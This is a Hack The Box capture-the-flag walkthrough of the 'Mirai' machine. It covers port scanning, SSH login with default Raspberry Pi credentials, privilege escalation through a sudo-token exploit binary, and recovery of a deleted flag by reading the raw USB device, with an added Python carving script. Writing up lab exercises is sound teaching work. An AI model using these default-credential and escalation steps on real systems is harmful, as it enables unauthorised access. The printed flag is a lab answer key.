hack the box walkthrough – Mirai machine
New easy Linux HTB machine today: Mirai!
The difficulty listed is easy.. let's find out.
Old habits die hard: let's start with our nmapAutomator scan:
```
[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.82.188 Full

Running a Full scan on 10.129.82.188

Host is likely running Linux

---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:41 EST
Initiating Parallel DNS resolution of 1 host. at 16:41
Completed Parallel DNS resolution of 1 host. at 16:41, 0.01s elapsed
Initiating Connect Scan at 16:41
Scanning 10.129.82.188 [65535 ports]
Discovered open port 22/tcp on 10.129.82.188
Discovered open port 53/tcp on 10.129.82.188
Discovered open port 80/tcp on 10.129.82.188
Warning: 10.129.82.188 giving up on port because retransmission cap hit (1).
Discovered open port 32400/tcp on 10.129.82.188
Connect Scan Timing: About 23.03% done; ETC: 16:43 (0:01:44 remaining)
Connect Scan Timing: About 44.31% done; ETC: 16:43 (0:01:17 remaining)
Discovered open port 1450/tcp on 10.129.82.188
Connect Scan Timing: About 67.48% done; ETC: 16:43 (0:00:44 remaining)
Discovered open port 32469/tcp on 10.129.82.188
Completed Connect Scan at 16:43, 136.87s elapsed (65535 total ports)
Nmap scan report for 10.129.82.188
Host is up (0.025s latency).
Not shown: 65089 closed ports, 440 filtered ports
PORT      STATE SERVICE
22/tcp    open  ssh
53/tcp    open  domain
80/tcp    open  http
1450/tcp  open  dwf
32400/tcp open  plex
32469/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.95 seconds

Making a script scan on extra ports: 1450, 32400, 32469

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-16 16:43 EST
Nmap scan report for 10.129.82.188
Host is up (0.029s latency).

PORT      STATE SERVICE VERSION
1450/tcp  open  upnp    Platinum UPnP 188.8.131.52 (UPnP/1.0 DLNADOC/1.50)
32400/tcp open  http    Plex Media Server httpd
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  Server returned status 401 but no WWW-Authenticate header.
|_http-cors: HEAD GET POST PUT DELETE OPTIONS
|_http-title: Unauthorized
32469/tcp open  upnp    Platinum UPnP 184.108.40.206 (UPnP/1.0 DLNADOC/1.50)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.49 seconds

---------------------Finished all Nmap scans---------------------

Completed in 2 minute(s) and 30 second(s)
```
We have quite a few open ports on this machine..
Let's start with port 80. When I opened it in the web browser I got a blank page. I ran dirbuster to check whether any files or folders could be found.
The admin folder brings me to a Pi-hole dashboard.
Thanks to Google, I found the default SSH credentials for the pi user: pi/raspberry.
```
[email protected]:~$ ssh pi@h10.129.82.188
ssh: Could not resolve hostname h10.129.82.188: Name or service not known
[email protected]:~$ ssh pi@10.129.82.188
pi@10.129.82.188's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

[email protected]:~ $ whoami
pi
```
A linpeas scan showed me that the user pi is a member of the sudo group, and I can use /tmp/shrndom with the sudo tokens exploit for privilege escalation.
```
[email protected]:~ $ sudo /tmp/shrndom
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# cd /root
# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
```
Where is my flag?
Oh ok… I thought I was done here..
A new linpeas scan showed me a disk mounted on /media/usbstick.
```
# cd /media/usbstick
# ls -al
total 18
drwxr-xr-x 3 root root  1024 Aug 14  2017 .
drwxr-xr-x 3 root root  4096 Aug 14  2017 ..
-rw-r--r-- 1 root root   129 Aug 14  2017 damnit.txt
drwx------ 2 root root 12288 Aug 14  2017 lost+found
# cat damnit.txt
Damnit! Sorry man I accidentally deleted your files off the USB stick. Do you know if there is any way to get them back?

-James
```
Oh god.. what have you done, James?
Deleting a file only unlinks it; its data blocks stay on the device until they are overwritten. So I ran strings against the raw USB device to recover the contents of root.txt:
```
# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
```
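To make the recovery step concrete, here is an added Python example (not from the original post) that does what `strings /dev/sdb` did above: it carves printable runs out of a raw image and picks the 32-hex tokens among them. The image, the directory names and the flag value are constructed placeholders, not the real device or flag; the same reasoning is why a plain `rm` is not a wipe and why a forensics workflow images the device before touching it.

```python
import re
import sys

PRINTABLE = set(range(0x20, 0x7F))      # same printable-ASCII range GNU strings uses
HEX32 = re.compile(rb"\b[0-9a-f]{32}\b")  # HTB-style 32-char lowercase hex token


def extract_strings(data: bytes, min_len: int = 4) -> list[bytes]:
    """Return every run of at least min_len printable bytes, like `strings`."""
    out, run = [], bytearray()
    for b in data:
        if b in PRINTABLE:
            run.append(b)
            continue
        if len(run) >= min_len:
            out.append(bytes(run))
        run = bytearray()
    if len(run) >= min_len:          # flush a run that ends at EOF
        out.append(bytes(run))
    return out


def find_hex_tokens(data: bytes) -> list[bytes]:
    """Carve 32-hex tokens from the printable runs of a raw image."""
    return [m for s in extract_strings(data) for m in HEX32.findall(s)]


# Constructed sample image: 0x00/0xff filler stands in for unused blocks, one
# directory block carries the names from the listing, and one orphaned data
# block still holds the content of the unlinked root.txt.
FILLER = b"\x00\xff" * 64
PLACEHOLDER_FLAG = b"0123456789abcdef0123456789abcdef"   # constructed, not the real flag
SAMPLE_IMAGE = (
    FILLER
    + b"/media/usbstick\x00lost+found\x00root.txt\x00damnit.txt\x00"
    + FILLER
    + b"Damnit! Sorry man I accidentally deleted your files off the USB stick.\n"
    + FILLER
    + PLACEHOLDER_FLAG + b"\n"
    + FILLER
)

if __name__ == "__main__":
    # Usage: python carve.py /path/to/image.dd  (reads the whole image into memory;
    # with no argument it runs against the constructed sample).
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_IMAGE
    for tok in find_hex_tokens(blob):
        print(tok.decode())
```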